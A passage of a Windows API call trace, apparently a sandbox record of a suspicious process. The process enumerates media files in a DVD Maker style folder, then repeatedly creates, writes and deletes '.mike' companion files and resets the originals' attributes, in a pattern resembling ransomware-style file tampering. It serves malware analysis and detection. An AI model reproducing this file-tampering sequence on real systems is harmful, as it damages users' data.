ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1fb8, dwReserved0=0x0, dwReserved1=0x0, cFileName="btn-next-static.png", cAlternateFileName="")) returned 1 [0066.251] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7268fbb9, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7268fbb9, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x553e929b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x20d6, dwReserved0=0x0, dwReserved1=0x0, cFileName="btn-previous-static.png", cAlternateFileName="")) returned 1 [0066.251] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x726b5d16, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x726b5d16, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x553e929b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x3c2, dwReserved0=0x0, dwReserved1=0x0, cFileName="button-bullet.png", cAlternateFileName="")) returned 1 [0066.251] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x726b5d16, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x726b5d16, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x553e929b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2cc, dwReserved0=0x0, dwReserved1=0x0, cFileName="button-highlight.png", cAlternateFileName="")) returned 1 [0066.251] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x726dbe73, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x726dbe73, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5540f3f9, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x47c1d, dwReserved0=0x0, dwReserved1=0x0, cFileName="content-background.png", cAlternateFileName="")) returned 1 [0066.251] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72701fd0, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72701fd0, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5540f3f9, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11276, dwReserved0=0x0, dwReserved1=0x0, cFileName="header-background.png", cAlternateFileName="")) returned 1 [0066.252] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72701fd0, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72701fd0, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x55435557, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x3126b, dwReserved0=0x0, dwReserved1=0x0, cFileName="passport.png", cAlternateFileName="")) returned 1 [0066.252] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7272812d, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7272812d, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x55435557, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x10e94, dwReserved0=0x0, dwReserved1=0x0, cFileName="Passport.wmv", cAlternateFileName="")) returned 1 [0066.252] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x727e67fe, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x727e67fe, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5545b6b5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x58bf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="passportcover.png", cAlternateFileName="")) returned 1 [0066.252] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7279a544, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7279a544, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5545b6b5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x7254, dwReserved0=0x0, dwReserved1=0x0, cFileName="PassportMask.wmv", cAlternateFileName="")) returned 1 [0066.252] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7279a544, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7279a544, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5545b6b5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x7254, dwReserved0=0x0, dwReserved1=0x0, cFileName="PassportMask_PAL.wmv", cAlternateFileName="")) returned 1 [0066.252] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x727c06a1, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x727c06a1, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x55435557, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x12b9, dwReserved0=0x0, dwReserved1=0x0, cFileName="passport_mask_left.png", cAlternateFileName="")) returned 1 [0066.252] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x727e67fe, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x727e67fe, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x55435557, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x12cd, dwReserved0=0x0, dwReserved1=0x0, cFileName="passport_mask_right.png", cAlternateFileName="")) returned 1 [0066.252] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7274e28a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7274e28a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x55435557, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1aaec, dwReserved0=0x0, dwReserved1=0x0, cFileName="Passport_PAL.wmv", cAlternateFileName="")) returned 1 [0066.253] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72538f74, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72538f74, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5545b6b5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x18337, dwReserved0=0x0, dwReserved1=0x0, cFileName="play-background.png", cAlternateFileName="")) returned 1 [0066.253] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72512e17, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72512e17, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5545b6b5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xbf1, dwReserved0=0x0, dwReserved1=0x0, cFileName="selection_subpicture.png", cAlternateFileName="")) returned 1 [0066.253] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x725f7645, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x725f7645, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x5545b6b5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x658e, dwReserved0=0x0, dwReserved1=0x0, cFileName="travel.png", cAlternateFileName="")) returned 1 [0066.253] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7258522e, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7258522e, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x55481813, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x321a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="TravelIntroToMain.wmv", cAlternateFileName="")) returned 1 [0066.253] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x725d14e8, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x725d14e8, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554a7971, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xef24, dwReserved0=0x0, dwReserved1=0x0, cFileName="TravelIntroToMainMask.wmv", cAlternateFileName="")) returned 1 [0066.253] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x725f7645, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x725f7645, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554a7971, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xef24, dwReserved0=0x0, dwReserved1=0x0, cFileName="TravelIntroToMainMask_PAL.wmv", cAlternateFileName="")) returned 1 [0066.253] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x725ab38b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x725ab38b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x55481813, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x37f64, dwReserved0=0x0, dwReserved1=0x0, cFileName="TravelIntroToMain_PAL.wmv", cAlternateFileName="")) returned 1 [0066.254] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0066.254] FindClose (in: hFindFile=0x4d1060 | out: hFindFile=0x4d1060) returned 1 [0066.254] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0066.254] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af170) returned 1 [0066.254] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0066.260] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0066.260] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0066.262] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0066.262] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0066.262] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0066.262] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0066.262] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0066.262] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0066.262] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0066.262] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0066.263] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-background.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-background.png.mike", lpFilePart=0x0) returned 0x51 [0066.263] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0066.263] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0066.263] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-background.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-background.png", lpFilePart=0x0) returned 0x4c [0066.263] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0066.263] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0066.263] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0066.263] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0066.264] WriteFile (in: hFile=0x288, lpBuffer=0x2140a14*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2140a14*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0066.264] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0066.265] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0066.265] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0066.265] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0066.267] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-background.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-background.png.mike", lpFilePart=0x0) returned 0x51 [0066.267] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0066.267] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0066.268] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0066.268] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0066.268] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-background.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-background.png.mike", lpFilePart=0x0) returned 0x51 [0066.268] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0066.268] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0066.269] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0066.269] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0066.269] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-background.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-background.png.mike", lpFilePart=0x0) returned 0x51 [0066.270] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0066.270] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0066.270] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0066.270] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0066.271] WriteFile (in: hFile=0x288, lpBuffer=0x216cd40*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x216cd40*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0066.271] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-background.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-background.png.mike", lpFilePart=0x0) returned 0x51 [0066.271] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0066.271] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0066.271] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-background.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-background.png.mike", lpFilePart=0x0) returned 0x51 [0066.272] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0066.272] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0066.272] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-background.png", dwFileAttributes=0x80) returned 0 [0066.273] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-background.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-background.png.mike", lpFilePart=0x0) returned 0x51 [0066.273] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0066.273] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0066.273] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-background.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-background.png.mike", lpFilePart=0x0) returned 0x51 [0066.273] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-background.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\16_9-frame-background.png.mike")) returned 1 [0066.274] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0066.275] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0066.275] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0066.275] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0066.276] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0066.276] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0066.276] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0066.276] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0066.276] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0066.276] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0066.276] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0066.276] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-highlight.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-highlight.png.mike", lpFilePart=0x0) returned 0x50 [0066.276] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0066.276] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0066.276] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-highlight.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-highlight.png", lpFilePart=0x0) returned 0x4b [0066.277] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0066.277] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0066.277] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0066.277] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0066.277] WriteFile (in: hFile=0x288, lpBuffer=0x2171f8c*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2171f8c*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0066.278] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0066.278] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0066.278] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0066.278] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0066.280] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-highlight.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-highlight.png.mike", lpFilePart=0x0) returned 0x50 [0066.280] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0066.280] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0066.280] WriteFile (in: hFile=0x288, lpBuffer=0x21783ec*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x21783ec*, lpNumberOfBytesWritten=0x2af074*=0x610, lpOverlapped=0x0) returned 1 [0066.280] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0066.280] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0066.281] WriteFile (in: hFile=0x288, lpBuffer=0x217b638*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x217b638*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0066.282] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-highlight.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-highlight.png.mike", lpFilePart=0x0) returned 0x50 [0066.282] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0066.282] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0066.282] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-highlight.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-highlight.png.mike", lpFilePart=0x0) returned 0x50 [0066.282] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0066.282] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0066.282] SetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-highlight.png", dwFileAttributes=0x80) returned 0 [0066.283] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-highlight.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-highlight.png.mike", lpFilePart=0x0) returned 0x50 [0066.283] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0066.283] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0066.283] GetFullPathNameW (in: lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-highlight.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-highlight.png.mike", lpFilePart=0x0) returned 0x50 [0066.284] DeleteFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Travel\\16_9-frame-highlight.png.mike" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\travel\\16_9-frame-highlight.png.mike")) returned 1 [0066.285] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0066.286] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0066.286] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0066.286] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0066.286] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0066.286] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", 